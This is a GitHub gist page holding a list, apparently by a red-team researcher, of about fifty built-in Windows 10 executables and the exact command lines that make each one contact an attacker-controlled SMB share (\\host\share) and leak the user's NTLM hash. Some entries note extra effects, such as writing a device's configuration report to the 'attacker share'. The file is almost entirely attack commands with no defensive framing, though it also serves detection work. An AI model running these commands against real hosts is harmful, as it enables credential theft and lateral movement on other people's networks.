Skip to content

Instantly share code, notes, and snippets.

/exes_for_NTLM_hash_capture.txt

Created March 5, 2018 04:24
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save anonymous/70f792d50078f0ee795d39d0aa0da46e to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save anonymous/70f792d50078f0ee795d39d0aa0da46e to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. @invalid-email-address Anonymous created this gist Mar 5, 2018.
    51 changes: 51 additions & 0 deletions exes_for_NTLM_hash_capture.txt
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,51 @@
    Executables for Capturing Hashes (incomplete list)
    (all file locations are system32 - win10, impacket-smbserver with -smb2support used for testing)

    @0rbz_

    attrib.exe \\host\share
    bcdboot.exe \\host\share
    bdeunlock.exe \\host\share
    cacls.exe \\host\share
    certreq.exe \\host\share (noisy, pops an error dialog)
    certutil.exe \\host\share
    cipher.exe \\host\share
    ClipUp.exe -l \\host\share
    cmdl32.exe \\host\share
    cmstp.exe /s \\host\share
    colorcpl.exe \\host\share (noisy, pops an error dialog)
    comp.exe /N=0 \\host\share \\host\share
    compact.exe \\host\share
    control.exe \\host\share
    convertvhd.exe -source \\host\share -destination \\host\share
    Defrag.exe \\host\share
    DeployUtil.exe /install \\host\share
    DevToolsLauncher.exe GetFileListing \\host\share (this one's cool. will return a file listing (json-formatted) from remote SMB share...)
    diskperf.exe \\host\share
    dispdiag.exe -out \\host\share
    doskey.exe /MACROFILE=\\host\share
    esentutl.exe /k \\host\share
    expand.exe \\host\share
    extrac32.exe \\host\share
    FileHistory.exe \\host\share (noisy, pops a gui)
    findstr.exe * \\host\share
    fontview.exe \\host\share (noisy, pops an error dialog)
    fvenotify.exe \\host\share (noisy, pops an access denied error)
    FXSCOVER.exe \\host\share (noisy, pops GUI)
    hwrcomp.exe -check \\host\share
    hwrreg.exe \\host\share
    icacls.exe \\host\share
    LaunchWinApp.exe \\host\share (noisy, will pop an explorer window with the contents of your SMB share.)
    licensingdiag.exe -cab \\host\share
    lodctr.exe \\host\share
    lpksetup.exe /p \\host\share /s
    makecab.exe \\host\share
    MdmDiagnosticsTool.exe -out \\host\share (sends hash, and as a *bonus!* writes an MDMDiagReport.html to the attacker share with full CSP configuration.)
    mshta.exe \\host\share (noisy, pops an HTA window)
    msiexec.exe /update \\host\share /quiet
    msinfo32.exe \\host\share (noisy, pops a "cannot open" dialog)
    mspaint.exe \\host\share (noisy, invalid path to png error)
    mspaint.exe \\host\share\share.png (will capture hash, and display the remote PNG file to the user)
    msra.exe /openfile \\host\share (noisy, error)
    mstsc.exe \\host\share (noisy, error)
    netcfg.exe -l \\host\share -c p -i foo